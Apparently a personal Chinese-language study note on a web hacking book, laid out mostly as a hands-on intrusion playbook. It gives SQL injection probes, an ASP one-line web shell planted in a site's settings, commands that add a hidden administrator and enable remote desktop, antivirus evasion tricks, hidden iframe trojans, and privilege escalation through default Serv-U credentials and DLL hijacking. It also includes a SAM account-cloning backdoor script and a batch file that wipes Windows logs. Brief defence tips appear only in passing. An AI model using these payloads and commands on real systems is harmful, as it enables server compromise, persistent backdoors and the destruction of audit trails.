黑客攻防web安全實戰詳解筆記

如有不足，歡迎指出，謝謝！

-----------------------------------------

1，url傳值

  GET傳值：其傳遞的值會附加到url上
  POST傳值：其傳遞的值不會加載url上
2,常見的數據庫類型：access（常作為小企業、網站的數據庫，一般都是access+asp組合，一般以.mdb/.asp/.asa為擴展名，
置於網站目錄下）、mysql（一般不在網站目錄下）、sql server、oracle、nosql
3，應用服務
·文件服務器：如NOVELL的netware
·數據庫服務器：
·郵件服務器：sendmail/postfix/qmail/microsoft exchange/lotus domino
·網頁服務器：如：apache/thttpd/iis
·ftp服務器：pureftpd/proftpd/wu-ftpd/serv-u
·域名服務器：bind9
·代理服務器：如squid cache

網站信息收集：網上在線搜索，whois，域名注冊的地方搜索
拓撲探測：服務器、防火牆、路由器 如軟件：VirsualROUTE

常用的端口掃描技術
tcp connect(),返回成功，端口屬於偵聽狀態
tcp SYN ,返回SYN|ACK 屬於開放，返回RST 端口關閉
tcp FIN ,返回開端的忽略請求包，關閉用適當的RST回復，有的系統都忽略
在線端口掃描

搜索引擎基本語法
filetype：擴展名    搜索結果僅返回有特定文件類型的網頁
info：url           返回需要查詢網站的一些信息
intitle:xxx         返回標題里有xxx的網頁
inurl：sss          在url里包含了sss的網頁

搜索后台（inurl:admin/login.asp)/site:xx.com intext:管理/
site:xx.com intext:用戶名 密碼/site:xx.com intext:login/
site:xx.com intext:manage/site:xx.com intext:admin/
site:xx.com intitle:后台/site:xx.com intitle:管理/

網站目錄：index of
轉到父目錄：to parent directory

一次完整的滲透入侵步驟：
#在虛擬機里下載的網站源
*找到可以sql注入的網頁，在目標網頁中任意點擊，在url后加入'/and 1=1/and 1=2,重新加載頁面，如果頁面返回不正常，則一定存在sql漏洞
**根據經驗找到后台url，使用弱口令嘗試
*用啊D檢測工具檢測，得到后台的用戶名 密碼，檢測后台登陸網址
*登錄成功，在系統管理里網頁名稱輸入："%><%eval request("123456")%><%’，一句話木馬，保存在/inc/setup.asp文件里
*用菜刀（木馬連接器)連接網頁文件，如http://localhost/inc/set.asp,密碼就是123456，在文件管理內可以管理該網站
*右鍵虛擬終端，創建用戶：net user test1 1234 /add,提權：net localgroup administrators test1 /add
*打開遠程連接的3389端口：REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
*用用戶名test1和密碼1234連接網站的服務器電腦，就可以控制對方電腦了
*留后門和清腳印（清日志）
  在建立用戶時用net user test1$ 1234 /add ，管理員在用net user查看系統用戶時就看不見了
  運行regedit， 進入HKEY_LOCAL_MACHINE--SYSTEM--CurrentControlSet--Control--Terminal Server--Wds--rdpwd--tds--tcp,將PortNumber從默認的
3389改為其他的，如13389。
  進入到HKEY_LOCAL_MACHINE--SYSTEM--CurrentControlSet--Control--Terminal Server--WinStations--RDP-Tcp，將PortNumber改為13389.
  下次訪問就用13389端口連接
 使用日志清除工具。

ip地址轉為10進制：如：220.181.18.155=220*256*256*256+181*256*256+18*256+155=3702854299
 
url：http://www.162.com:123456@3702854299  表示用戶名是www.162.com,密碼是123456，請求3702854299，@后的才是真正訪問機頁面
一般網頁是不會顯示前面的用戶名和密碼的，這個是用來迷惑用戶的釣魚連接

Unicode編碼：樣式為“%5c%23”

host文件：修改host文件域名對應的ip地址，可以訪問到不同的地方去

.ocx 控件文件

--------------

sql注入

count（）：函數確定字段名和表名

確認表名：http://127.0.0.1/login.asp?uname=admin' and(select count(*) from data)>0 and 'a'='a   amd count值大於0表示這個表中有值，既存在表。

確認字段：select count(uname) from data>0   //uname是我猜測的可能存在的字段名，注意常用的用戶名/密碼字段名，如果頁面返回正確，則存在該字段名

len(）函數：確認密碼/用戶名的長度

len（upass）(>、=)1

二分法：len（upass）<16 / len(upass)<8

mid(字符串，起始位置，長度)函數：mid（'abcd',2,2)表示從第二位開始的兩個字符，得到的結果就是bc

也可以模糊查詢：mid(upass,1,1)>'a'  或mid(upass,1,1)>'z'

用戶名：admin   密碼：admin的MD5加密

Trim(),去掉空格

sql漏洞防御：捕獲關鍵詞：select，where，union等出力

跨站腳本攻擊（xss）防御：用戶輸入的數據都要過濾，將特殊字符（如尖括號之類的)轉化為html特殊字符集里的字符，就不會當成代碼來執行（如‘>’==“&gt”）

后門免殺，殺毒軟件是根據特征碼來判斷是否為病毒文件的

* 第一種放方法 ，先把asp代碼編碼，執行時在解碼，如Script Encoder 加密后的文件以<%@LANDUAGE=VBScript.Encoder %>開頭

*第二種方法，利用ASP中的execute函數，使用來執行字符串的，如execute("response.write(""test"")")==》response.write("test"),由於execute函數里的代碼是字符串，故遇到雙引號要雙寫）

-----------------------------

一句話木馬：

<%eval request("123456")%>

<%execute request("1")%>

-------------------

圖片asp木馬：copy 1.jpg /b + 1.asp /a asp.jpg  ,/b是指定以二進制格式復制、合並文件，參數/a指定以ASCII格式復制、合並文件

配置不當提升權限，入侵者常關注的目錄：

C:\Document and settings\

C:\Document and settings\All Users

C:\Document and settings\All Users\【開始】菜單\程序、

C:\Document and settings\Administrator\桌面

C:\Document and settings\All Users\Application Data\symantec\PCanywhere

C:\Program Files\

D:\Program Files\

C:\Program Files\Internet Explorer

C:\Program Files\Serv-U\

C:\Program Files\java web start\

C:\Program Files\mocrosoft sql server\

C:\WINNT\SYSTEM32\CINFIG\

C:\winnt\system32\inetsrv\data\(完全控制權限）

C:\prel\（有寫權限）

c:\temp\

c:\mysql\

c:\php\（有寫權限）

 

@Windows 2000\xp 的Runas命令，允許用戶用其他權限運行特定的工具和程序，而不是當前登錄用戶所提供的權限

    @FAT32和NTFS的區別：

    fat（文件分配表）意義在於對硬盤分區的管理，常見的有FAT16/FAT32;

    NTFS：1）增加了計算機的安全性，可以對單個文件或文件夾設置權限

                 2）只為寫入的文件部分分配磁盤空間

                 3）元數據恢復記錄，可在計算機斷電或發生其他系統問題時盡快恢復信息

                 4）在重啟計算機之后不需要運行chkdsk.exe硬盤自檢工具即可立刻訪問卷，可用來監控和控制單個用戶使用的磁盤空間量

                  5）最大驅動器容量遠大於fat最大容量，順驅動器容量的增加，性能不下降

     

其他第三方提權介紹：

serv-u提權：使用serv-u，用戶可以將任何一台pc設置為服務器，就可以是用ftp協議，在同一網絡上的pc機連接服務器，進行文件或目錄的操作，serv-u>3.x的默認端口是43958，默認管理員是LocalAdministrator,默認密碼是#l@$ak.lk;0@p;                   serv-u除了密碼漏洞外還有本機溢出和servUDaemin.ini文件覆蓋

PcAnywhere提權：這是一個遠程控制軟件，密碼保存在軟件目錄下的CTF文件里，解密破解得到密碼

VNC提權：是一個遠程控制工具，默認端口是5900,5901,5902，密碼保存在注冊表HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WINvnc4\password中，解密得到密碼

Radmin提權：遠程控制軟件，默認端口是4899，密碼為空。密碼注冊表：HKEY_LOCAL_MACHINE\SYSTEM\RAmin\V2.0\Server\paremeters\Parameter；端口注冊表：HKEY_LOCAL_MACHINE\SYSTEM\RAmin\V2.0\Server\paremeters\port

搜狗提權：目錄默認是可寫的，

    pinyinup.exe 是搜狗 輸入法的的自動升級程序，替換后，下次自動升級就會調用提權程序
    ImeUtil.exe  是開機啟動程序，替換后，重啟啟動就會運行提權程序
    popup.dll 是運行時加載的一個文件，替換后，就會在運行時執行提權操作

dll劫持：將軟件運行時執行的dll文件替換為提權程序，加載程序時，提權操作也就執行了，這種行為刀座dll劫持

lcx端口轉發：反向鏈接，用於外網pc機不能連接內網機但內網機可以連接外網機

DOS:磁盤操作系統，dos命令是面向磁盤的操作命令

DOS:denial of server 拒絕服務,

DDOS::Distributed Denial of Service，分布式拒絕服務，將多個計算機聯合起來攻擊一個或多個目標

tcp/ip：Transmission Control Protocol/Internet Protocol,傳輸控制協議/網絡互聯協議

網馬隱藏：

    使用框架：<iframe src=“木馬頁面” width="0" height="0"></iframe>
    不算漏洞的漏洞：IE瀏覽器，如果在一個圖片文件里有html代碼，就會解析並執行這些代碼

殺毒軟件是檢測指定位置的代碼是否與數據庫里保存的病毒特征碼一致

加殼技術：將程序代碼加密，在程序代碼開始的部分插入解密代碼，執行時就解密程序在運行；

壓縮殼（帶有壓縮功能的殼）：這樣的加殼技術會使程序的體積變大，應用壓縮技術，經過加殼的程序反而比沒有加殼的程序小

花指令（沒有意義的代碼），將代碼開頭插入（jmp）跳轉到無用的空間（一般在程序結尾處）執行花指令（inc eax&dec eax==eax加1和減1），然后再回到開頭執行原來的代碼，這樣所有的代碼位置會向后移動，殺毒軟件的指定位置的代碼就變了。

rootkitt是一種特殊的惡意軟件，它的功能是在安裝目標上隱藏自身及指定的文件、進程和網絡鏈接等信息，比較多見到的是Rootkit一般都和木馬、后門等其他惡意程序結合使用。檢測rookit的工具有IceSword和Darkspy105

基於內網的入侵

內網又稱局域網（local area network,LAN)主要技術要素是：網絡拓撲（總線，星型，環形，樹形，混合型），傳輸介質（有線或無線）與介質訪問控制方法（以太網，令牌環網，FDDI網和無線局域網）

旁注的意思是：利用同服務器的其他網站的漏洞入侵，之后獲得該網站的控制權

C段的一般認為是IP分類中的C類段地質類，但是在黑客術語中C段的意思是同網段服務器入侵，對目標服務器處於同一網段的其他服務器進行入侵，在通過內網滲透對目標服務器入侵； 同網段是指：如目標ip思10.0.12.18，那么10.0.12.1~10.0.12.255是同網段的，常見於安全性極高的帶大型網站 {c段在線查詢}

域：將多個計算機聯合，用戶賬號，密碼在同一個數據庫里，一個的用戶可以用不同的電腦登陸自己的賬號；在域內訪問其他機器，不再需要被訪問機器的許可（加入域要得到域管理者的許可，也可以由與管理者添加用戶）

內網信息刺探：

    ipconfig /all 獲得主機網卡信息
    net view 顯示當前域或工作組中的計算機列表
    net view /domain [:domainname] 查看指定計算機可用的域
    net user /domain 查看用戶列表
    net group "domain admins" /domain 查看域管理組成員
    net user 管理員名 /domain 獲取域管理員信息
    net /help 或net ? 獲取net可操作對象
    net user /help或？ 獲取net user的具體使用方法

 ARP協議：通過目標設備的IP地址，查詢目標設備的MAC地址；

互聯網的通信是基於IP地址的，但在一個局域網中的通信是基於MAC地址的

局域網中的ip地址是變化的，例如學校網絡，每一次聯網，分配的IP地址都是不一樣的，所以用MAC地址通信

ARP欺騙：攻擊者C在B給出相應前，回應A，自己就是B，並將自己的MAC地址發送給A，那么A就會以為C的mac地址就是B的，並向C的MAC地址發送原本要發送給B的數據，同時，也可以對B說自己是A

賬號后門

手工克隆賬號：直接給管理員權限的賬號可以是用 命令或賬號管理查看賬號的真是權限，而克隆出來賬號卻無法被上述方法查出  ；

實例：賬號guest被禁用，管理員無法查看真實權限，但真實就是可以用還是管理員權限{圖形界面}

步驟一：以system權限打開注冊表編輯器：[HLM]\SAM/SAM\Domains\account\users\names

步驟二：克隆賬號：找到Administirs權限的類型，根據類型找到同樣的賬號配置健，打開復制里面的數據，在找到賬號guest的權限類型，找到賬號配置健，粘貼數據，克隆完成

步驟三：禁用賬號：命令{net user guest /active:no}    然后就沒有操作了，我很疑惑被禁用的用戶怎么還能用，就因為被克隆了嗎？

用命令行制作賬號后門

步驟一：編寫文件

    編寫reg文件並保存為delf.reg:

    Windows Registry EdItor Version 5.00

    [HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5]

    "f"=-

    編寫bat文件，並保存為zhdoor.bat

    psu -p "regedit /s delf.reg" -i %1

    psu -p "reg copy hklm\SAM\SAM\Domains\Account\Users\000001F4\f hklm\SAM\SAM\Domains\Account\000001f5\f" -i %1

    net user guest /active:yes

    net user guest 123456789

    net user guest /active:no

    del delf.reg

    del psu.exe

    del zhdoor.bat

步驟二：查看遠程主機/服務器中system進程的PID：通過工具, 一般PID=8

步驟三：上傳文件、登錄遠程主機

步驟四：執行bat文件 ,命令：winnt\zhdoor.bat 8

    編寫BAT文件手工清除日志

    @del C:\WINNT\SYSTEM32\LOGFILES\*.*

    @del C:\WINNT\SYSTEM32\CONFIG\*.EVT

    @del C:\WINNT\SYSTEM32\DTCLOG\*.*

    @del C:\WINNT\SYSTEM32\*.LOG

    @del C:\WINNT\SYSTEM32\*.TXT

    @del C:\WINNT\*.LOG

    @del C:\WINNT\*.TXT

    @del C:\CLEARLOG.BAT